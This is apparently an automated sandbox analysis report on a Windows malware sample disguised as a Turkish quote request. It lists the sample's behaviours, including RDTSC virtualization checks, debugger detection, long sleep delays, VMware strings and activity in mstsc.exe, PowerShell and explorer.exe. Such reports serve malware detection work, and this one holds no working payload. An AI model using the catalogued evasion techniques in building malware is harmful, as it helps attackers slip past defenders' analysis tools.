          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 29B9904 second address: 29B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 29B9B7E second address: 29B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: 9910000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: A910000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: AB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: BB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: C1F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: D1F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: E1F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5863Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3873Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9730Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 1074Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 8898Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13826
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 0.4 %
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe TID: 2832Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4360Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1816Thread sleep count: 9730 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1816Thread sleep time: -19460000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1816Thread sleep count: 212 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1816Thread sleep time: -424000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700Thread sleep count: 1074 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700Thread sleep time: -2148000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700Thread sleep count: 8898 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700Thread sleep time: -17796000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007D26C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose,8_2_007D26C7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007F80BE GetSystemInfo,8_2_007F80BE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0040ACF0 LdrLoadDll,4_2_0040ACF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007FF581 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,8_2_007FF581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0087B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,8_2_0087B05F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C061C3 mov eax, dword ptr fs:[00000030h]4_2_01C061C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C061C3 mov eax, dword ptr fs:[00000030h]4_2_01C061C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h]4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h]4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h]4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h]4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h]4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h]4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h]4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C161E5 mov eax, dword ptr fs:[00000030h]4_2_01C161E5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFC188 mov eax, dword ptr fs:[00000030h]4_2_01BFC188
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFC188 mov eax, dword ptr fs:[00000030h]4_2_01BFC188
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B80185 mov eax, dword ptr fs:[00000030h]4_2_01B80185
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE4180 mov eax, dword ptr fs:[00000030h]4_2_01BE4180
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE4180 mov eax, dword ptr fs:[00000030h]4_2_01BE4180
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B701F8 mov eax, dword ptr fs:[00000030h]4_2_01B701F8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h]4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h]4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE1D0 mov ecx, dword ptr fs:[00000030h]4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h]4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h]4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B70124 mov eax, dword ptr fs:[00000030h]4_2_01B70124
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEA118 mov ecx, dword ptr fs:[00000030h]4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h]4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h]4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h]4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h]4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C00115 mov eax, dword ptr fs:[00000030h]4_2_01C00115
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46154 mov eax, dword ptr fs:[00000030h]4_2_01B46154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46154 mov eax, dword ptr fs:[00000030h]4_2_01B46154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C156 mov eax, dword ptr fs:[00000030h]4_2_01B3C156
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD8158 mov eax, dword ptr fs:[00000030h]4_2_01BD8158
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h]4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h]4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD4144 mov ecx, dword ptr fs:[00000030h]4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h]4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h]4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD80A8 mov eax, dword ptr fs:[00000030h]4_2_01BD80A8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4208A mov eax, dword ptr fs:[00000030h]4_2_01B4208A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C0F0 mov eax, dword ptr fs:[00000030h]4_2_01B3C0F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B820F0 mov ecx, dword ptr fs:[00000030h]4_2_01B820F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A0E3 mov ecx, dword ptr fs:[00000030h]4_2_01B3A0E3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC60E0 mov eax, dword ptr fs:[00000030h]4_2_01BC60E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B480E9 mov eax, dword ptr fs:[00000030h]4_2_01B480E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC20DE mov eax, dword ptr fs:[00000030h]4_2_01BC20DE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C060B8 mov eax, dword ptr fs:[00000030h]4_2_01C060B8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C060B8 mov ecx, dword ptr fs:[00000030h]4_2_01C060B8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6030 mov eax, dword ptr fs:[00000030h]4_2_01BD6030
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A020 mov eax, dword ptr fs:[00000030h]4_2_01B3A020
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C020 mov eax, dword ptr fs:[00000030h]4_2_01B3C020
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h]4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h]4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h]4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h]4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC4000 mov ecx, dword ptr fs:[00000030h]4_2_01BC4000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h]4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6C073 mov eax, dword ptr fs:[00000030h]4_2_01B6C073
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42050 mov eax, dword ptr fs:[00000030h]4_2_01B42050
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6050 mov eax, dword ptr fs:[00000030h]4_2_01BC6050
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h]4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h]4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h]4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6438F mov eax, dword ptr fs:[00000030h]4_2_01B6438F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6438F mov eax, dword ptr fs:[00000030h]4_2_01B6438F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h]4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h]4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h]4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h]4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h]4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h]4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B763FF mov eax, dword ptr fs:[00000030h]4_2_01B763FF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov ecx, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE43D4 mov eax, dword ptr fs:[00000030h]4_2_01BE43D4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE43D4 mov eax, dword ptr fs:[00000030h]4_2_01BE43D4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFC3CD mov eax, dword ptr fs:[00000030h]4_2_01BFC3CD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC63C0 mov eax, dword ptr fs:[00000030h]4_2_01BC63C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0A352 mov eax, dword ptr fs:[00000030h]4_2_01C0A352
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C310 mov ecx, dword ptr fs:[00000030h]4_2_01B3C310
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B60310 mov ecx, dword ptr fs:[00000030h]4_2_01B60310
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE437C mov eax, dword ptr fs:[00000030h]4_2_01BE437C
